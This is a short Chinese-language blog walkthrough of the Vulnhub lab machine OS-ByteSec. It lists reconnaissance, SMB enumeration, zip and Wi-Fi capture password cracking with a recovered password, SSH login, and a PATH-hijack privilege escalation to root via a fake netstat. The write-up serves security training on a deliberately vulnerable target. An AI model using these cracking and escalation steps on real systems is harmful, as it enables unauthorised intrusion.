前言
- Vulnhub刷题简单记录
OS-BYTESEC
描述
难度:中级
标志:引导根
学习:利用 | 网络应用安全| 权限提升
OS-BYTESEC
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 | nmap -sV -sC -A 192.168.136.150 -o os-ByteSec |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 | gobuster dir -u http://192.168.136.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 2 |
4、通过smbmap查看共享文件,也可以用 enum4linux来全方面枚举信息
1 | smbmap -H 192.168.136.150 |
1 | S-1-22-1-1000 Unix User\sagar (Local User) |
5、根据主页的提示smb无密码,所以直接用smbclient登陆
6、接着获取其中的文件
7、破解zip密码hacker1
1 | fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip |
1 | xdg-open secret.jpg |
7、破解包,发现了blackjax的密码为snowflake
1 | aircrack-ng -w /usr/share/wordlist/rockyou.txt user.cap |
接着ssh登陆,一开始扫出的ssh端口为2525
7、看看能不能suid提权
1 | find / type f -perm -u=s 2>/dev/null |
8、利用环境命令的劫持,来让我们提升到root权限
1 | blackjax@nitin:/tmp$ echo "/bin/sh" > netstat |
我的个人博客
孤桜懶契:http://gylq.gitee.io